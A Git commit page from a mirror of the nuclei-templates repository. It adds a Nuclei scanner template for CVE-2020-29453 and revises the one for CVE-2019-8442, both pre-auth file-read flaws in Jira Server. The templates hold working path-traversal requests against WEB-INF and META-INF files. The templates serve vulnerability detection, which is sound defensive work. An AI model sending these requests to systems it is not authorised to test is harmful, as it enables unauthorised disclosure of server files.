daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2461 from dwisiswant0/add/CVE-2020-29453 

Add CVE-2020-29453
patch-1
Sandeep Singh 2021-08-23 14:56:44 +05:30 committed by GitHub
parent cd6b3608af 451e938d46
commit 174cd79e1b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 32 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
cves/2019/CVE-2019-8442.yaml
View File

@ -8,21 +8,18 @@ info:
tags: cve,cve2019,atlassian,jira,lfi
requests:
- raw:
- |
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: deflate
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
- "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <groupId>com.atlassian.jira</groupId>
- '<groupId>com.atlassian.jira</groupId>'
part: body

26
cves/2020/CVE-2020-29453.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-29453
info:
name: Pre-Auth Limited Arbitrary File Read in Jira Server
author: dwisiswant0
severity: medium
description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
reference: https://jira.atlassian.com/browse/JRASERVER-72014
tags: cve,cve2020,atlassian,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
- "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<groupId>com.atlassian.jira</groupId>'
part: body